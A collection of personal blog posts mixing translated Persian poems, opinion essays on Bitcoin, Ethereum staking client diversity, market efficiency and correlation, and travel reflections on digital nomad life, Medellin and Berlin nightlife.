As always, may the language gods forgive me for my mistakes. Any feedback is always welcomed and appreciated.

I yearn to have my home,
full of friends.
In every litte corner,
friends seated in peaceful calm,
recounting stories, hearing stories...

Anyone who wishes to enter,
my pretty home full of love and camaraderie,
gift me a basket,
full of the scent of red roses.

The condition to enter,
is to cleanse the heart.
The condition to have that,
is a heart and soul, clear and pure...

On its door, I will hang petals of a flower.
On it, I will write with the green brush of spring.
I will write, hey friend
Our house is here!

So that Sohrab asks no more,
"Where is the friend's house?"

Almost 15 years after the introduction of the Bitcoin's whitepaper, I still hear this declaration frequently, and usually with a conviction inversely proportional to the price of Bitcoin. I am sure you have seen various versions of this claim by now, but here is one of my all-time favorites.

Allow me to elaborate why saying "Bitcoin is a Ponzi scheme" means you have no understanding of what a Bitcoin is, but perhaps more importantly, neither what a Ponzi scheme is.

First, let's revisit what makes a Ponzi scheme from the SEC itself:

A Ponzi scheme is an investment fraud that pays existing investors with funds collected from new investors. Ponzi scheme organizers often promise to invest your money and generate high returns with little or no risk. But in many Ponzi schemes, the fraudsters do not invest the money. Instead, they use it to pay those who invested earlier and may keep some for themselves.

If I buy a Bitcion from you and receive a Bitcoin at the price agreed, where is the Ponzi? This is not a discussion on what the price of a Bitcoin should be. In a Ponzi scheme, the promised returns are not realized and new funds are funneled to the previous investors to sustain the returns, or outright stolen. A Ponzi scheme's central characteristic is that the funds available are not sufficient for the operations of the scheme and hence the need for constant flow of new money to repay older claims.

An exchange made for Bitcoin is on the public blockchain and anyone can independently verify that promised Bitcoin left your wallet and arrived in mine. There is absolutely no ambiguity in a straight-forward Bitcoin transfer about the parties involved and the amount that changed on the network.

A Bitcoin exchanged for any other currency is no different that exchanging USD for EUR. You may have a view on how under or overvalued EURUSD cross might be, but even no matter how undervalued you think the US dollar is versus the Euro doesn't mean that there is a Ponzi scheme involved. It is an equal exchange of two assets, not an investment fund run by a central party.

Disagreeing over the fair market value is what makes a market of buyers and sellers. Otherwise, why would there be such a high volume of transactions every minute of every day far exceeding the value of total economic output?

To be a bit generous, I presume when you hear someone say Bitcoin is a Ponzi scheme, they are trying a hyperbolic version of the greater fool theory. Maybe. I have generally found the "Bitcoin is a Ponzi scheme" to be a bad-faith argument with little understanding of crypto, or Ponzi schemes for that matter. Whether BTC at 55k is a buy or sell has nothing to do with a Ponzi scheme argument.

Bitcoin is many things. There are a number of valid criticisms. A Ponzi scheme, however, is certainly not one of them.

If like me you were taught market efficiency in school, you probably told something like this:

The Efficient Market Hypothesis (EMH) is a hypothesis in financial economics that states that asset prices reflect all available information. A direct implication is that it is impossible to "beat the market" consistently on a risk-adjusted basis since market prices should only react to new information.

And it would immediately go on to define three forms of market efficiency:

Weak, semi-strong, and strong-form tests In Fama's influential 1970 review paper, he categorized empirical tests of efficiency into "weak-form", "semi-strong-form", and "strong-form" tests.

These categories of tests refer to the information set used in the statement "prices reflect all available information." Weak-form tests study the information contained in historical prices. Semi-strong form tests study information (beyond historical prices) which is publicly available. Strong-form tests regard private information.

Ultimately testing for market efficiency is impossible since you will always have a joint hypothesis problem. Even models widely in use such as Capital Asset Pricing Model (CAPM) wouldn't pass the simplest empirical test. Yet the investment banking industry squarely relies on CAPM because bankers are not quite concerned with the fundamental valuation of securities, but rather what fee they can collect for providing their services to you. Sell-side models are simple and primarily concerned with relative pricing of securities to other assets.

Market efficiency is something you only really encounter in school. The entire hedge fund industry is only possible on the premise being otherwise. The market efficiency even in its weak form doesn't stand any empirical tests. Fama's own student, wrote a seminal paper showing that a factor as simple as momentum, which solely uses past prices, can consistently provide excess returns.

Critical in the teaching of all asset pricing models in school is the assumption of no arbitrage. Meaning there is no truly risk-free money to be made in the markets. This is where market efficiency truly shines.

What the hell does that mean? It means that there exists combination of assets that produce payoffs equal to other assets. A long call plus a short put is a forward. A covered call is a collateralized short put. Index futures basis rarely gets out of hand versus its underlying assets. There are numerous market linearities that are consistent and provide no opportunity for true arbitrage. That is where the market is almost always efficient. It is quite rare to see true arbitrage in the market. If you think you have discovered true arbitrage, you should look harder for multiple reasons where actual realization of the profit might not be possible.

True arbitrage is certainly possible, but it is rare to see it last.

Last year I spun an Ethereum validator after having used pooled staking for a while. What prompted the action was the desire to contribute to Ethereum network's decentralization and robustness given that I had the hardware and required eth to run a solo staking validator.

It is no secret that Ethereum has a client diversity problem. While the consensus layer diversity has improved over the last year to bring Prysm under acceptable limits, Geth's +80% share as an execution client is absolutely a risk and needs to be addressed.

When spinning up my validator, I chose Nethermind, a minority client, as my execution layer to help diversity away from Geth. Yesterday I woke up to see my validator is offline. A quick check of the logs made it clear that the issue lies with the client and a trip to EthStaker and Nethermind's discord channel confirmed what was going on. A hotfix was released in a few hours and everything was up and running again.

A postmortem is not available yet at the time of this writing, so I do not know how this escaped the testnet and impacted the mainnet directly. Nonetheless, kudos to the Nethermind team for promptly addressing the issue. And a sincere thank you to all the fellow stakers who run minority clients.

This experience sent me looking deeper what could have happened if the same had happened to Geth. To be clear, this is not throwing shade at Geth at all. They are an amazing team of engineers and have done a stellar job. Client diversity is a feature of Ethereum and helps bolster the network's decentralization in one more dimension.

The main reason for Geth's popularity is the heavy usage by pooled / centralized solutions running staking as a service. Aside from having the longest track record, Geth is also a bit lighter on hardware requirements vs other clients. Nonetheless, staking on Ethereum was designed to be accessible for solo stakers and plenty of inexpensive consumer grade hardware can run a full node.

Running an Ethereum validator comes with rewards and penalties and while being offline for a few hours wouldn't normally be a big deal, if 1/3 of the validators are offline then the chain wouldn't be able to reach finality and enters an emergency protocol called "inactivity leak". If what happened to Nethermind had happened to Geth, then Ethereum would have entered the emergency protocol and depending on how fast the network recovers, potentially millions of eth could've been wiped out given the quadratic nature of penalties during a majority blackout. While extremely unlikely, a few days of blackout on Geth has the potential to wipe out the entire 32 eth stake of each validator!

Dankard Feist has a great write-up that digs deep into this scenario.

Normally a validator that goes offline accrues a penalty equal to the amount it would have earned instead. With validator reward hovering around 2.5% at the time of writing, this is nothing to sweat about for a few days. However, if 1/3 of validators go offline, then the chain cannot finalize and quadratic penalties kick in. Other factors such as being in a sync committee might exacerbate the penalty.

It is worth emphasizing that while a full blackout of the network is extremely unlikely, none of us is above Murphy's law. Anything that can go wrong, will go wrong.

The above sound pretty scary, but here are a few things that mitigate a prolonged blackout (measured in days) that you can do right now to protect yourself and help the network along the way.

• Switch Clients - Nethermind, Besu, and Erigon are tried and tested execution clients that can be switched over to right now. Syncing normally takes a few hours with a fast internet connection. In the case of a blackout with other validators offline there will be fewer peer nodes to connect to, but the mechanism is in place. This is the best mitigator and if you run an ethereum node you should diversify away from Geth as soon as possible. In non-centralized staking solutions such as Dappnode, Rocket Pool, or your own hardware, switching client is as easy as clicking a few buttons or running a few command lines.

• Solo Staking - The best way to help the network is running a solo staking validator. The hardware requirements are accessible and while 32 eth is a substantial sum, there are a variety of pooled staking such as Rocket Pool you could consider. Staking on centralized exchanges however, while might be the "easy" option is generally not a good idea. As always, not your keys, not your coin.

• Exiting Validators - The exit queue has been a few hours long at most for a while now, but you do not need your own node to be running to be able to exit your validator. As long as you have set an exit address (which should have happened when you generated your validator keys), then you can simply use a tool such as beaconcha.in and exit your validator. This helps the network finalize faster and stop your penalties. The queue will surely swell if there is a rush to the gate, but nonetheless an important mechanism in place.

• Running 2 Ethereum Nodes - This is more suited to professional setups or if you are running more than one validator. That said, you can run two full nodes and switch your validator over to the functional one, should one go out.

As the saying goes, any decentralized network is only as decentralized as its most centralized part. Geth's supermajority status is a risk to the network that while extremely unlikely can have an effect similar to the DAO fiasco that I think few of us would want to live through again.

If you have the time and the means to run a solo staking validator, consider running a minority client. Not only it is a hugely educational undertaking, it will help bolster the overall network's health, and you will collect financial rewards on your validator as well. Who knows, might even get a juicy MEV-charged block too!

The next halving is expected to occur sometime in the first half of 2024, and no doubt you have already been hearing that the "stock-to-flow" model is predicting some grand target number. The argument goes something like this:

Current stock of bitcoin is X btc. Right now we are mining Y btc every year. When halving occurs since Y is now halved the ratio of X/Y goes up, so bitcoin price must go up. It will then be accompanied by some charts that show that over the previous halving cycles the price of bitcoin has increased.

Now take that argument to when all 21 million bitcoins have been mined, i.e. flow at zero. Working backwards you will get infinity for the price of the bitcoin.

If a model doesn't work in the terminal state, why should it have any merit now?

There are many valid reasons to attribute value to bitcoin, but the stock-to-flow model isn't quite one of them, no matter how scientific one makes it sound.

You may have heard blockchain described as a decentralized ledger, distributed database, shared records, etc. which don't quite explain what use blockchain actually has. Blockchain is also often equated with Bitcoin or referred to as a payment system. It is neither. While the bitcoin whitepaper introduced blockchain as a technology, it also introduced bitcoin as its most famous use case. Bitcoin is primarily used as a store of value similar to gold. Blockchain's use cases however, go beyond transfers of value.

Blockchain is a combination of mathematics and computer science concepts that were widely used before the publication of the whitepaper. Satoshi invented neither decentralized ledgers nor cryptography. Ever used a password before 2008? Chances are the technology behind your authentication used more or less all the technology that bitcoin uses to this day.

The real innovation of the blockchain technology is combining them to provide a real solution to a real world problem.

Before blockchain came around, there was no real way to verify uniqueness of a digital asset without involving a trusted third-party.

In order to understand why a third-party is needed without involving blockchain, we need to take a quick trip to the early days of the internet. The internet as we know it today was mostly developed in the US universities and military institutions. Its main goal, and hence primary focus of development, was the transfer of information. It does however, a terrible job at transferring value.

A copy of a text document, an audio file, an executable, etc. are all equal to each other. There is no real and fast way to know which is the copy and the original. That is completely fine if you are only interested in sharing information. Sending a cute cat photo to your bff doesn't need to involve verification of which is the original and which is the copy. A PDF of an academic paper is as good as the original. You both have exact copies of the same thing.

This makes a terrible system for transfers of value, e.g. payments. If I send you a dollar, you absolutely would need to know that I didn't send the same dollar to another person, a problem known as double-spending. That's the primary reason for payment processors to exists. In the US where the current largest and most-developed financial system exists, it takes at least three entities to send an ACH (Automated Clearing House) transfer which powers most of your every day non-credit transactions, including Venmo, Wise, among other popular apps.

The first obvious issue is with each middle party comes extra fees. If you have ever traded a stock listed on US exchanges, you probably paid fees to the Depository Trust & Clearing Corporation without even realizing it. That's over 2 billion USD in fees paid every year, taken from nearly every security transaction that is skimmed for what is quite literally, the digital equivalent of physically moving around paper stock certificates from the 1960s. That is not an exaggeration.

And on top it still takes 3 business days to settle even the simplest of transactions in the most advanced financial system in the world.

Blockchain by the virtue of providing a trustless mechanism for moving value eliminates all middles parties and allows transaction to reduce to just the transferor and transferee. It is exactly how unregistered securities such as bearer bonds could be exchanged between two individual before digitization and regulation introduced a plethora of rent-seeking middle parties.

The second issue is that in the current financial system settlement is tightly controlled with enormous frictions especially when it comes to international transfers. Ever tried to send money to someone who is not from your country? Even sending money between similar financial systems such as the US and Canada is an uphill battle with the only viable solutions being some fintech firms such as PayPal, Wise, or Revolut. Not all are available in every country, all have fairly high fees, and you are trusting the platforms to safeguard your money. Contrast that experience to this 6 billion USD transfer sent over the bitcoin network, where the total fee paid was less than 5 USD at the time, and settled in less than 10 minutes.

Blockchain solves a real-world problem which happens to be exceptionally suited for transfers of value. That is largely the premise behind Bitcoin. There is a whole sub-sector under the umbrella term of Decentralized Finance (DeFi). That said, blockchain has plenty of non-financial applications such as decentralized governance, proof of identity, funding of projects, etc. Here is an excellent talk by Vitalik that lays out some non-financial use cases.

Before you go, if you remember anything from this article, let it be that blockchain is a technology that enables verifying whether something is unique digitally, without the need for a trusted third-party.

Every once in a while I come across a situation where I see someone convinced that their form of payment has to be accepted because it is "legal tender". Usually it is someone insisting a store has to take their cash or a long-winded essay about Bitcoin's status as legal tender.

Legal tender means that you can legally pay your debt with it. That's it. Here it is from the largest money printing machine in the world:

Is it legal for a business in the United States to refuse cash as a form of payment?

There is no federal statute mandating that a private business, a person, or an organization must accept currency or coins as payment for goods or services. Private businesses are free to develop their own policies on whether to accept cash unless there is a state law that says otherwise.

The main backing of a fiat currency system is the might of the government behind it, and legal tender means any government-mandated debt can be legally repaid with it, including your taxes.

Merchants have every incentive to maximize their sales, which is why they try to accept a variety of payment forms. This has nothing to do with their legal obligation to accept any particular method of payment, however. They can refuse all cash, only accept cash, or straight up go for a good old-fashioned barter system.

import CorrChart from "./charts/CorrelationChart.tsx";

Let's start out with a simple test. In the image below, are returns of the Stock 1 (cyan) correlated with the returns of Stock 2 (green) positively or negatively?

If you answered postively, you are hardly alone. In fact, the returns of Stock 1 and Stock 2 have a perfect correlation of negative one in their returns. Even though they are both increasing, and start and end at the same value.

A common misconception is that if two series are moving the same direction that means they are positively correlated. There are plenty of articles in financial literature that claim exactly this. See Investopedia, and Robinhood here for instance:

A positive correlation indicates that two variables have a relationship with each other and move in the same direction — when one rises or falls, so does the other.

That is not true, and unfortunately an all-too-common belief that misses a crucial point about correlation. You cannot generally tell the correlation of two stocks, or any time-series for that matter, by looking at a chart.

In the chart above, Stock 1 and Stock 2 are both increasing every day together in the same direction, yet they are perfectly negatively correlated. You can see the values here in this Google Sheets. How can this be then?

It is because correlations are calculated around the mean, and do not indicate direction whatsoever. If you look at the correlation formula below, you can see that the mean of each series in deducted in the numerator. That means that if two series are positively correlated, they are moving together with respect to their own individual means.

Correlation on its own has no information about the direction of time-series. The only metric indicating long-term direction is the average.

In the chart above, Stock 1 and Stock 2 are both increasing at the average rate of 2.5 units every step, however they are increasing in alternating [1, 4] and [4, 1] increments. This means that when Stock 1 is increasing by 1 unit (below its average of 2.5), Stock 2 is increasing by 4 units (above its average of 2.5), thus the perfect negative correlation between the two.

Now can you guess the correlation between Stock 1 and Stock 3?

Note that throughout this article we discussed the most common measure of correlation, which is the Pearson Correlation Coefficient.

In the last 1.5 years of nomading around the world, I have been to 16 countries. Yet somehow I ended up spending 6 months in Colombia with 5 of those in Medellin. Something about that math seems fuzzy, but I double checked.

I began my nomading journey in Medellin and have little doubt it will also be where it ends. I remember the first time as we came out of the tunnel driving from the airport and seeing the city lights... how the music was getting louder as we were getting closer to Provenza... Like a river flowing to the sea, I keep coming back. As I sit in the airport waiting for my flight to CDMX, I reflect on how the hell it is my sixth time coming back.

Here is my (gringo) take, unfiltered and raw.

Once you get to know Colombians better, you start recognizing them as Paisa , Costeño, Rolo, etc. The Paisas come from the Northwest of Colombia, where Medellin is home to the largest city in the region. They rightfully have a reputation as some of the most welcoming and kind people you will ever meet, and that hospitality extends towards foreigners. They are proud of their culture and heritage and have moved on from their dark history. Sometimes to a fault of pretending it didn't even happen. I particularly get a kick out of their selective memory, such as telling you how they absolutely crushed Argentina 5-0 in a historic football match... which happened in 1993 ;)

Colombians have got to be some of the happiest and most extroverted people I have ever met. Growing up in Iran where foreign music or any form of dance is illegal, Colombia is the antithesis to the religious extremism I grew up in which plagues my place of birth to this day. You hear music just about everywhere you go, see people dance on the streets, and don't have to think twice about holding your date's hands in public. In my second home of Canada, the laws might be liberal, but the culture is still conservative overall, maybe except Montreal. Still, it is nowhere near Latin America.

In Medellin I made a number of friends that I consider close friends. It is something you have to experience yourself first hand. The latino culture is generally warmer, and friendships are more real than my primary reference point of USA/Canada. Nowhere that felt truer than Medellin. Some of the best friends I made were while beating each other in MMA gyms, trying to learn Salsa, bar hopping around town, or at language exchanges especially my favorite Gringo Tuesdays!

Metropolitan area of Medellin is actually a collection of several cities. Nicknamed the city of eternal spring, it really is the greenest city I have stepped in thus far. The weather is more or less a pleasant 25c everyday with varying rainfall throughout the year. There are plenty of attractions worth checking out. There are many scenic hikes in and around the city for all levels. The subway system in Medellin is modern, affordable, and fairly safe. Ubers are safe and widely available. It also has some of the most surprisingly large and modern shopping malls I have seen. Huge bonus point, you can drink the tap water and it's tasty!

The national sport of Colombia is Tejo, which is basically cornhole with explosives! Yup, you read that right. It is a "blast" to play, and while Bogota has the real deal, you can certainly give it a go in Medellin. Check out Anthony Bourdain playing Tejo here.

Oh, and the coffee scene. Just amazing.

As a tourist, chances are you will spend the bulk of your time in a particular area in Medellin called El Poblado. It certainly has been my favorite neighborhood. The nightlife is second to none with 6 blocks of streets packed with bars, restaurants, and clubs. My favorite spot for going out ever is located here, and I cannot recommend it enough: Mad Radio.

The nightlife is one of the best things about Medellin, and there are plenty of hotspots around town. It has this amazing energy and vibe to it that you just need to experience. El Poblado is the largest neighbourhood and where I spent the majority of my time, but I have been to Laureles and Buenos Aires neighbourhoods as well and they are certainly worth checking out. Getting on a chiva bus is a must, it is one of the most outrageous and funnest things you'll do, and one that certainly wouldn't pass insurance in most countries :)

It is however a huge bubble and most people who stay in Medellin for longer tend to graduate to other neighbourhoods at some point, primarily Laureles. For your first visit I highly recommend staying in El Poblado. It is a good mix of locals and foreigners, fairly safe and walkable, and if Spanish is not your forte, then there will be plenty of help available in English.

Now that I gave you all the rainbows and sunshines, here are some of the negatives about Medellin. The traffic during rush hour is rough. There are areas where you should not go wandering around, certainly not by yourself. You may have heard about one of the scariest drugs known to mankind, Scopolamine and while with some precautions you should be fine, it does happen to the unsuspecting tourists who venture out of depth. Despite a strict gun ban, firearms in the hands of criminals is not rare, and stories about getting pickpocketed or robbed are all too common. While I absolutely love the accents in Colombia, some of the words in general use (ahem... marica) feel extremely wrong and not ones you would ever hear me say.

Here is what I can say about the above, those are hardly negatives that only apply to Medellin. I could've just as simply with a few small changes had been talking about any other major city, including some of the rougher parts of the richest nation ever, the United States. In the vast majority of countries, wandering around without some prior planning is not a smart choice.

Medallo is absolutely beautiful, but it has thorns. Some sharper than rest. Enjoy all it has to offer but keep your guard up.

I am acutely aware that my rose-colored glasses are heavily influenced by my experience as a visiting foreigner. While I have spent quite a bit of time in Colombia, I have only observed the life experiences at a distance, which importantly includes working locally. Nor have I had to deal with what daily life as a Colombian truly entails. Probably if I had to commute daily in traffic, had a corporate job in an office, needed to file taxes, etc, I wouldn't have liked it as much as I do. That said, I try to keep a balanced view of places I go, and for all that Medellin offers at its cost of living, it is thus far my preferred city to settle in for the long-term.

Now if it only had a beach, pretty sure I would just never leave!

Nos vemos pronto 😍

Today is Nowruz, the beginning of the Persian New Year, marking the first day of Spring. As is storied tradition, I read one of my favorite poems in Persian. I have translated it to English to the best of my ability below. As always, may the language Gods forgive me for my mistakes.

A recurring and profound theme in Persian poetry is living your precious gift of present to the fullest and lamenting the capricious promises of tomorrow. این نیز بگذرد. Carpe diem, if you will. Seize the day! The most famous quote might just be Khayyam's:

"Be happy for this moment. This moment is your life".

Alas, life is short! You have heard that phrase all your life. It actually is. Up until last year, I thought I understood it too. I did not. It wasn't until I started living on the road that I started to truly grasp what living in the present means.

Time is experienced in a continuum. Once I graduated college, I slipped into that comfortable numbness of living where your days are more or less the same, blending in the haze of a familiar repetitious routine. I wasn't unhappy, but ask me what I did on any given day and it probably wasn't any different from the year before unless I was on my "2-week" vacation. Weekdays from 8am to 6pm I was at work. In summers I played beach volleyball every Wednesday. I did Muay Thai/CrossFit every other day. During winters, I would wake up in pitch black to go to work and call it a day in pitch black. I went to the same bars with the same great friends. First Mondays in August I was almost surely at Osheaga. I lived on the same intersection since I graduated college. I worked ten years at a job that while I was excellent at and gave me financial security, never inspired my curiosity or fueled my potential. You get the idea.

Once I started travelling, I started experiencing time in discrete sums. Synchronizing work schedules, visa limits, and life obligations I am constantly calculating how many days I can be in one location. I tend to be a slow traveller, so I stay most places for a month or so. Even then, no matter how you measure it, 30 days in one location isn't really much of anything. Most people I meet now, I meet only once. It is a strange feeling at times. Striking a friendship or taking a liking to someone, knowing that in all probability, all the time you will ever spend with them is right there and then.

This realization has made me appreciate my time far more than I used to when I was in my semi-jaded comfortable existence with an office job and a fancy condo. You don't really feel the time going by in that state. You expect the days to keep coming, and you'll carry on living. It is easy to think that because you spend the vast majority of your time at work, then it must be the most important thing in your life too. I was a hyper competitive and excellent employee in the corporate rate race that rewarded conformity and personal relationships masqueraded as a meritocracy. Plenty of Kool-Aid to go around!

I call my parents almost every day now. I don't take for granted the happiness when I see a great friend once again. I chase the sunsets when the hue of orange melts into the distant sea with the sound of waves crashing into my feet. I let waves of thoughts pick me up and take me far in my daydreams. I consciously eliminate destructive tendencies and build better habits. I do my best to learn from my mistakes, but damned I be if I die with more regrets!

Last year was an enormously difficult year for my country. While I have lived most of my life in North America, I will always be grateful for my difficult but rewarding upbringing in Iran. Persian is a beautiful language full of emotions packed with similes and metaphors. You will only need to see Haft-Seen once to appreciate how deep symbolism runs in Persian.

I will close this with one of the most potent panaceas that words can offer, courtesy of my literature teacher to me as a young teenager:

Time reduces even the greatest wildfires to cold ashes.

You will not last,
Neither will sorrow.
And neither will any of the people in this small town.

I promise, like the nervous bubble at the edge of the stream,
as transient as that moment of happiness lasted,
your sorrow, will pass too.
Such that all that remains is the memory.
The moments are bare.
Never wrap your present moment, in sorrow.

Poet: Keyvan Shahbodaghi

As the year draws to a close, thought it would be a good time to reflect on what has been the greatest year of my life. It is hard to overstate how different this year has been from my former life as a semi-jaded office drone in a suit working in the financial district.

You would think after almost a year and half of full-time traveling 15 countries and working remotely I would be somewhat tired of it, but here I am with the same twinkle in my eye, feeling the same excitement, typing this away on my laptop while I wait to board my flight on three hours of sleep.

Solo traveling might sound intimidating at first. To the uninitiated, it might even sound lonely. Rest assured, after over a year of traveling, lonely is not a feeling I can recall. You will meet amazing people all along, and whether it's another solo traveler or a big group of people speaking a language you do not understand, the only thing you ever need to start talking is "Hi"!

It is a magical word, and one that has never failed me. It is crazy to think that I used to feel intimidated talking to strangers. Now it feels as natural as drinking water.

Your most liked social media post might just be that cool sunset melting into the sea over that high cliff, but let me tell you this. Some of the fondest memories I have are drinking cheap booze, in the twilight hours, in the most nondescript places that you wouldn't bother to take a second look at. It is not the scenery that I remember, but how I felt in those moments with the company I had.

There will be moments when your life will feel perfect. Days when you feel every breath, every heartbeat, every single caress of wind on your skin, every ray of sun on your shoulders. It is as addicting of a feeling as I have ever felt. It is a feeling you will continue to chase, and one that certainly you will not be able to describe in eloquent words to your friends back "home".

While solo traveling, your highs will be higher, but your lows will also be lower. On average, the trade-off is one worth to me. Not everyone wants to be on the road full-time. That is perfectly fine. You will find your own rhythm. One downside of traveling is that you will have a crew that you click with, and then people start to leave at some point...

Slow traveling helps to not burn out. If you are moving every week to a new destination, you are more prone to burning out and feeling homesick. Embrace the ephemeral nature of your moment and be thankful for it.

I have been told there is a concept for this in Japanese: mono no aware.

Your best source of information is other travelers. Ask for their social media if you feel they match your vibe. Sometimes you can travel together, other times you can check out their social media especially if they're going to places of interest to you. When I started traveling, I completely changed my plans because I met so many people I liked that talked up parts of Mexico I hadn't heard about. It lived up to the hype and then some.

Remember that most hostels are staffed at least partially by other long-term travelers. They are usually some of the best friends you will make.

For slow travelers like me, making local friends is essential. Find something that likely would not attract short-term tourists. For me Muay Thai gyms have been an excellent source of local friends since it's far more likely to be attended by locals. Same goes for team sports, art classes, etc.

If like me you stay mostly in hostels, the sheer volume of people you meet every day can feel like Tinder in real life. The curse of every digital nomad is falling in love with a local who cannot work remotely... While I am hardly the serial monogamist type, I have had a heartbreak or two here and there. Don't get too attached, and embrace the time you have with the people you meet at the moment. Make every effort to pursue the ones that you must.

Quoting Life of Pi, one of my all-time favorites: "I suppose in the end, the whole of life becomes an act of letting go, but what always hurts the most is not taking a moment to say goodbye."

This is one of my favorite things about nomading. The ability to get away from that comfortable numbness of falling into what my friend, Dan King, calls the M&M (Marriage & Mortgage) lifestyle. You won't believe how many people tell me that they envy the life I have. The only difference is that I lived a life by design and not by default. I know the societal pressure to conform first-hand, especially as you get older and all our friends start putting roots down and lives revolve around their kids.

I am well aware that I may miss out on part of what makes me a human, but as far as I have ever known myself not for a second did I wish to get married and have kids.

Here is an excellent source to see what the "average nomad" looks like. Bet it looks different than the average weekend warrior at a party hostel eh?

If you plan ahead and budget, even more so if you're coming from a high-cost country, working remote and traveling might just be even cheaper. I am living on half of what it used to cost me to live in Toronto, and I am not pinching pennies by any measure.

Budget accordingly, and don't starve yourself of experiences thinking that you will come back. Life is short, the world is wide, and there is plenty to do.

This was carved on top of the bar in my frat house in college. Don't be reckless, but do not be afraid to take calculated risks either. A little bit of preparation can massively improve your experience, especially when traveling the less trodden path.

Most people in this world want to improve their lives and be an upstanding citizen. It doesn't mean that you should let your guard down whatsoever, but that does mean that what you see in the media and how other people are portrayed is just plain wrong. Ask the average North American what they can say about Colombia, and they'll say "Escobar" or "Cocaine". Mexico is reduced to Tulum or Cancun. I cannot tell you how far from the truth these stereotypes are, and how damaging they can be.

I have lived in Canada most of my life and can simply say I am Canadian. Yet I always say I am from Iran because the majority of the time I am the first Iranian most people have met, especially in South America. It matters to me that the people I meet along the way to remember that people in Iran are no different from them, regardless of whatever propaganda their governments throw at them.

I gravitate toward "social" hostels far more than "party" hostels. It is an important distinction I learned quickly. Some of the best hostels I have ever stayed in (EastSeven in Berlin, Selina Medellín, Hostel One in Prague, The Loft in Budapest, etc.) all had some things in common. For starter, they all have kitchens which tends to be where you meet a lot of other people. Having a community resident or experience manager where activities are coordinated by the hostel is another one. I would generally stay away from party hostels where the sole focus is how big of a pub crawl (organized by a third party) you can get. Don't get me wrong, I love a pub crawl as much as the next guy, but I'm guessing that most long-term travelers want to meet each other and not necessarily the 12-person crew who just rolled in for a bachelor/bachelorette party.

Learning Spanish has been one of the best decisions I ever made. Not only it has opened up a whole new continent and culture to me, it is similar enough to Portuguese and Italian that you could muster some basic conversation in either. Sometimes it feels like a magic trick. I remember pounding drinks with this grandpa in Rio speaking only Spanish with him responding in Portuguese, and somehow we talked over an hour about the upcoming Brazilian elections!

Nothing says I care about your culture more than being able to utter a few words in someone's native tongue.

This is somewhat of a difficult topic to explain to people from rich countries. The average Canadian has never experienced or witnessed hunger. People are rich beyond their own comprehension.

Putting aside mental illness, nobody's first ambition is to be a criminal. It is often a choice of expected value that drives crime. The latest smartphone likely sells for over a thousand dollars second hand, so in a world where the GDP per capita is barely 12k USD a year, you should know that stealing your phone versus going hungry might just convince someone to do it, not because they want to ruin your day, but because it is the most lucrative option available to them.

Here is the flip side of it, leave your expensive branded stuff at home and travel light. You'd barely notice you don't have them anymore. I have a second crappy phone for that reason. My pictures look potato quality, but I have yet to have someone pull a weapon on me for it.

Lastly, while I don't look like a MMA heavyweight champion, I don't look exactly like a pushover either. I am aware that being male grants me safer passage than my fellow female travelers. For what it's worth, I have met just as many solo female travelers, and the majority of safety precautions is the same for both. Here is a rapid list of what has worked for me:

• Don't flash anything expensive, new iPhones particularly make you a mark.
• Travel in groups when you can. Ask other travelers whether taking the bus or a cab is safe. Uber usually is safest. Sit near the front of the bus where you are the most visible and closest to the exit.
• Do not ever leave your drink unattended, or accept an open drink from a stranger.
• Share your phone location with a few trusted people, especially if you're doing something unfamiliar.
• Get a good travel credit card and use as much as you can, have as little cash on you as needed.
• If you find yourself facing a weapon drawn, just give away what you have. No amount of money is worth your life.
• The local police in some countries can be corrupt. That's why in some locations you'd see the army patrolling in full gear.
• If you find yourself lost in a sketchy area, do your best to avoid attention. If you need to look at maps on your phone, go into a store before you take your phone out. Call the Uber to the store.
• Take pictures of everything. Of your luggage, your passport, the license plate of the cab you're gonna get in. Even your laundry receipt.

Stating the obvious, but you do need to make sure you maintain a healthy routine. If like me you are primarily staying in hostels, you will always be outnumbered by tourists. Skimping on staying active and bumping up your partying to keep up with people on their "2-weeks" will take a toll on your physical and mental health.

Your body enables you to do the things you want in your life. Take care of it.

You'll learn plenty of hacks as you go along. Maximizing USB-C gadgets means minimizing all cable clutter. You might find packing cubes useful. Waterproof shoes can double as every day shoes and hiking shoes. Refundable tickets or onward ticket services can get you out of a bind in countries which insist you show an exit ticket. WhatsApp groups are huge in Latam with invaluable information from expats. Offine Google Maps and Google Translate are essential. Also, get a phone which can take eSIMs, you'll thank me later for it.

The most important one! We have this tremendous opportunity for effectively the first time in our history to see most of our amazing planet.

Maybe inside I am still just a little boy who wants to wake up and have an awesome adventure. To feel that today might just even be more exciting than yesterday. That I'll make new friends. Perhaps learn a new skill, or discover a place I had never been to before. Or maybe, I'll work all day because that's just what I feel like doing that day. There is a whole world out there!

To the people I've met along my journey, thank you with all my heart for being part of my adventure! I am sure I will see many of you around 😍

As I approach the last week of my 10-week European trip, and my fifth eurotrip overall, I think it is worth writing a few things now that I likely have discovered my favorite city ever: Berlin.

I don't think any city will even come close. My travels are far from over, but given what I know about myself, Berlin is just about the perfect city if I were going to call a city home. I was going to stay for only a week, ended up staying for almost three. Huge disclaimer: Throughout I am talking about Berlin in the summer.

First and foremost, the nightlife is impeccable. I know Berlin and Electronic Music go hand in hand, and surely that's what Berlin does best, but I went to plenty of other places that cater to a variety of different tastes and didn't see a single place I did not like. Kreuzberg was my favorite neighbourhood for going out from the small surface I scratched.

Clubbing in Berlin was so outstanding that I am afraid it might have ruined almost anywhere else for me, certainly North America. Clubbing as a guy in North America is a weird ritual. The number one reason most guys get turned away in NA is because they don't have enough girls with them. After that hurdle, paying a multiple of the girls' cover or getting bottle service is almost surely expected.

Not in Berlin. Not even close.

From the famous large clubs, I went to Sisyphos, Watergate, Tresor, ://aboutblank, and Anomalie for some of the legendary parties that start Friday night and continue without closing to Monday morning. Sisyphos with its mini outdoor festival vibes was my favorite. The bouncers occasionally ask you vibe-check questions like "Do you know who is playing today?", or "Why are you coming here to party?" which at times feels like you're passing a school quiz to get in, but given the amazing crowds inside I think the Berliners have gotten it right! I met plenty of people in Berlin in front of me who when asked "How many are you?" answered "One". Incredible. To be able to go out just for the love of the music and not worry about all the other bullshit you grow accustomed to in NA with bottle service and being treated as a walking ATM. What a treat to the ears!

Despite going out for two weeks straight I do not have anything to show you how it was. All the places I went to specifically prohibit taking videos/photos inside and cover your cameras with stickers upon entrance. In KitKatClub, they take your phone away entirely. Just a bunch of people from all walks of life, mostly dressed in plain black attire, enjoying some stellar music in good company and nowhere but in the moment.

